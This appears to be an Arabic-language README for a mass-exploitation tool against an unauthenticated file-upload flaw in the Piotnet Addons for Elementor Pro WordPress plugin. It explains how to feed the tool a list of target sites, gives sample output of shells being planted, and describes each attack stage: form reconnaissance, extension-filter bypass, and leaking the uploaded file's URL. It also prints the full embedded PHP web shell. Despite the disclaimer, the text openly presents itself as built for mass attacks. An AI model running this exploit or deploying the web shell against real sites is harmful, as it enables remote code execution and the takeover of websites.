
Piotnet Addons for Elementor Pro <= 7.1.70 - رفع ملف تعسفي غير مصادق عليه عبر نموذج رفع الملفات
رفع ملف عشوائي غير مصادق عليه يؤدي إلى تنفيذ تعليمات برمجية عن بُعد (RCE) في Piotnet Addons for Elementor Pro ≤ 7.1.70.
هذه الأداة مصممة للاستغلال الجماعي – قم بتغذيتها بقائمة من الأهداف، وسوف تقوم تلقائيًا بـ:
post_id وform_id واسم حقل التحميل الصحيح.phtml، .php3، .php4، .phps، .pht، .php2) لتجاوز عوامل التصفية الضعيفةpafe_export_databaseLogic_Internet) وحفظ الرابط في shells.txt⚠️ إخلاء مسؤولية
هذه الأداة للاختبارات الأمنية التعليمية والمصرح بها فقط.
الاستخدام غير المصرح به ضد أنظمة لا تملكها غير قانوني.يمكنك الاطلاع على إخلاء المسؤولية الإضافي على غلاف Jenderal92. يمكنك التحقق منه هنا !!!
data-pafe-form-builder-field-name، data-elementor-id، إلخ)https:// إذا كان مفقودًا/contact، /apply، /quote، /book-appointment، …)wp-content/uploads/piotnet-addons-for-elementor/ ومسارات الجذر المباشرةrequestspip install requests
التثبيت
git clone https://github.com/Jenderal92/CVE-2026-4885.git
cd CVE-2026-4885
الاستخدام
أنشئ ملفًا باسم targets.txt (أو أي اسم) مع رابط واحد لكل سطر:
https://example1.com
example2.com
http://vulnerable-site.org
python2 CVE-2026-4885.py targets.txt
سوف يقوم السكريبت بـ:
shells.txtمثال على المخرجات
[*] Loaded built-in shell (598 bytes)
[*] scanning 25 pages...
[+] found form at https://target.com/contact | post_id=13 form_id=fa2c60e field=file
[*] post_id=13 form_id=fa2c60e field=file
[*] trying .phtml
[+] uploaded .phtml
[+] shell URL: https://target.com/wp-content/uploads/piotnet-addons-for-elementor/xxx-6a11e162a6099.phtml
[+] SHELL UPLOADED -> https://target.com/wp-content/uploads/piotnet-addons-for-elementor/xxx-6a11e162a6099.phtml
خيارات سطر الأوامر (قابلة للتخصيص في السكريبت)
يمكنك تغيير هذه القيم بتعديل أعلى السكريبت.
الشيل المضمن هو:
GIF89a;
<?php
echo 'Logic_Internet'.'<br>'.'Uname:'.php_uname().'<br>'.$cwd = getcwd();
Echo '<center> <form method="post" target="_self" enctype="multipart/form-data"> <input type="file" size="20" name="uploads" /> <input type="submit" value="upload" /> </form> </center>'.'<br>';
if (!empty ($_FILES['uploads'])) {
move_uploaded_file($_FILES['uploads']['tmp_name'],$_FILES['uploads']['name']);
Echo "<script>alert('upload Done');</script><b>Uploaded !!!</b><br>name : ".$_FILES['uploads']['name']."<br>size : ".$_FILES['uploads']['size']."<br>type : ".$_FILES['uploads']['type'];
}
?>
SHELL_CODE في السكريبت).اكتشاف الإصدار
?ver= في أصول البرنامج المساعد.الاستطلاع
post_id وform_id واسم حقل رفع الملف الصحيح من سمات HTML الخاصة بـ Piotnet.الرفع
wp-admin/admin-ajax.php?action=pafe_ajax_form_builder.EXT_LIST حتى ينجح أحدها.التسريب
pafe_export_database الذي يعيد CSV يحتوي على الرابط الكامل للملف المرفوع.xxx-{random}.ext.التحقق
Logic_Internet.shells.txt عند النجاح.UnicodeEncodeError على Windows
يحتوي السكريبت بالفعل على دالة safe_unicode() تتعامل مع الأحرف غير ASCII. إذا كنت لا تزال ترى أخطاء، تأكد من أن الطرفية تدعم UTF-8:
chcp 65001
لم يتم العثور على نموذج / فشلت جميع الامتدادات
TIMEOUT أو MAX_THREADS.فشل التسريب ولكن الرفع نجح
pafe_export_database معطلة أو محمية./wp-admin/admin-ajax.php?action=pafe_export_database يدويًا في المتصفح لترى ما إذا كان يمكن الوصول إليه.| المتغير | الوصف | الافتراضي |
|---|
| TIMEOUT | مهلة طلب HTTP | 10 ثوانٍ |
| MAX_THREADS | عدد الخيوط المتزامنة | 20 |
| OUTPUT_FILE | أين يتم حفظ روابط الشيل الناجحة | shells.txt |
| EXT_LIST | امتدادات الملفات للمحاولة | .phtml، .php3، .php4، .phps، .pht، .php2 |